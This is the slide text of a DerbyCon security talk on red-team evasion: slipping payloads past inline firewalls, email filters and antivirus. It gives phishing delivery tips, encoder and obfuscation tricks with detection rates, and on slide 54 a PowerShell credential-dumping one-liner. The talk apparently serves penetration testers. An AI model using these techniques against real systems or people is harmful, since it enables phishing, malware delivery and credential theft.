Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Modern Evasion Techniques

DerbyCon 7.0
@curi0usJack

  • Login to see the comments

Modern Evasion Techniques

  1. 1. Modern Evasion Techniques a.k.a - How to Concatenate Strings Jason Lang - @curi0usJack
  2. 2. PowerShell, Macros, CSharp Proofpoint, Mimecast Palo Alto, Fortinet. Cisco. Most of them. Anti-Virus Evasion Payload Customization Inline Control Workarounds NG Email Controls 4 3 1 2 Topics
  3. 3. Thank you: @Bandrel @jarsnah12 @slobtresix0 @midnite_runr msf/empire devs
  4. 4. About • 10+ years full time InfoSec • Sr Consultant @ TrustedSec • Specialties: Active Directory, Development (C# Python PowerShell) • Hobbies: Woodworking, Beekeeping, Fly Fishing Jason Lang @curi0usJack
  5. 5. PAUSE
  6. 6. blue harder
  7. 7. Inline Controls • Defined: A network layer control that performs real- time threat prevention • Two biggest contenders: Palo Alto, Fortinet. • My testing was performed with a fully licensed, up-to- date Palo Alto, as well as a Cisco 5500 with FirePower
  8. 8. Meterpreter (stock) Test Cases Empire Pupy Custom Meterpreter •windows/x64/meterpreter/reverse_https •Default certificate •Port 443 •Empire 2.1 •Default Certificate •Standard stager •Port 443 •obfs3 transport •Defaults •Port 443 •Custom C# code •Whatever I wanted Victim Machines: Windows 7/10 x64. Windows Defender
  9. 9. Cisco Configuration 9 • Rules: Blocking all the things • SSL Decryption: ON
  10. 10. Cisco Configuration 10 https://www.cisco.com/c/en/us/td/docs/security/firepower/60/configuration/guide/ fpmc-config-guide-v60/Access_Control_Using_Intrusion_and_File_Policies.html
  11. 11. Cisco Configuration 11 MAX DETECTION MODE:
  12. 12. PA Configuration 12 • Vuln Protection: All the things set to reset_both • Wildfire: ON • SSL Decryption
  13. 13. Meterpreter Results 13 • With SSL Decryption • Session Opened/Closed • Without SSL Decryption Results were the same for the Custom C# Meterpreter.
  14. 14. Pupy Results 14 • With SSL Decryption • Without SSL Decryption Win10 Defender ^^
  15. 15. Empire Lulz A story in screenshots
  16. 16. Empire Lulz After running our launcher…
  17. 17. Empire Lulz
  18. 18. Empire Lulz Nah… this shouldn’t work…there’s no way… A minor server change:
  19. 19. Empire Lulz
  20. 20. Inline Evasions • If you must use msf, use auxiliary/gather/ impersonate_ssl
  21. 21. Inline Evasions
  22. 22. Inline Evasions
  23. 23. Inline Evasions • Pay attention to Decryption/Detection patterns. • Favor Empire/Pupy over MSF if you are getting detected. Change all defaults. • Change your template**. • Hope you’re working with a Cisco firewall. ** https://www.blackhillsinfosec.com/modifying-metasploit-x64-template-for-av-evasion/
  24. 24. Email Controls • Defined: Anything that stops my phish from getting to the inbox • Examples: Proofpoint, Mimecast, Google spam filters
  25. 25. Email Controls Thanks to @CaseyCammilleri for all the shells!
  26. 26. Email Controls
  27. 27. Email Controls
  28. 28. Email Controls
  29. 29. Email Controls Apache mod_rewrite to the rescue!
  30. 30. Email Controls Add to /etc/apache2/sites-enabled/000-default.conf
  31. 31. Email Controls Create /var/www/html/.htaccess Moar awesome redteam infrastructure guidance here: https://bluescreenofjeff.com/
  32. 32. Email Controls
  33. 33. Email Controls Thanks for the tip @slobtresix0!
  34. 34. Email Controls
  35. 35. haha AV https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10
  36. 36. Email Controls ^ Shell from JOHNNYSPC (Wildfire) ^
  37. 37. Email Controls
  38. 38. Email Controls
  39. 39. Email Controls
  40. 40. Email Controls
  41. 41. Email Controls
  42. 42. Email Controls
  43. 43. Email Controls Q: What if Google is blocking on the recipient’s side?
  44. 44. Email Controls A: You forgot this. ^^ Correct SPF Record for sending via O365 ^^
  45. 45. Email Workarounds 1. Obfuscate your payload (generally the most basic will do) 2. Set SPF/DKIM Records 3. Use links instead of attachments 4. mod_rewrite is your friend 5. Check the phish with isnotspam.com 6. Don’t trip threshold alerts. Send targeted phish slowly
  46. 46. Anti-Virus
  47. 47. Anti-Virus • First things first thing’s first: Understand current state • Test payloads against Virus Total • Focused on the major players: Symantec, McAfee, Trend, Windows Defender, Cylance
  48. 48. Anti-Virus Type Template Args/Notes Detections Major Player Binary (x86) No None 51/64 Yes Binary (x64) No None 41/64 Yes Binary (x64) Yes None 16/62 Yes Binary (x64) Yes Custom C# 6/64 Yes (MS) Binary (x64) Yes C#, -e xor -i 4 3/64 Yes (MS) Binary (x64) Yes C#, -e zutto_dekiru 2/64 No PowerShell No Unicorn 1/56 No Binary (x64) Yes Ebowla 0/64 No
  49. 49. AV Evasion #1 - Custom C# 1 49 • Receives msfvenom -f csharp output • Easily modified to suit needs • Basic exe detection: 6/64
  50. 50. AV Evasion #1 - Custom C# 2 50 • Runs powershell code without powershell.exe
  51. 51. Demo: C# Payload Generation
  52. 52. AV Evasion #1 - Custom C# 2
  53. 53. • AV Vendors are simply searching for strings • Remove all comments • Change function names / param names • Concatenate your encoded commands AV Evasion #2 - PowerShell
  54. 54. AV Evasion #2 - PowerShell powershell -W 1 -c “. .Invoke-Minicars.ps1; Invoke-Minicars -GimmeCreds” https://gist.github.com/curi0usJack/adbf34bd402f28138388bd6e266da961
  55. 55. AV Evasion #3 - Ebowla 55 • Encrypts payload with target env variable • Self decrypts on execution • Basic exe detection: 0/64 • https://github.com/Genetic- Malware/Ebowla
  56. 56. Demo: Chaining it together Payload Gen -> Evasion -> Delivery Vehicle
  57. 57. Tools 1. MSF/Empire - You should know where these are at. =) 2. Pupy - https://github.com/n1nj4sec/pupy 3. Unicorn - https://github.com/trustedsec/unicorn 4. Ebowla - https://github.com/Genetic-Malware/Ebowla 5. Luckystrike - https://github.com/curi0usJack/luckystrike 6. C# Demo Extras 1. https://github.com/curi0usJack/psfire 2. https://github.com/curi0usJack/custompayload
  58. 58. Thank you! =)

×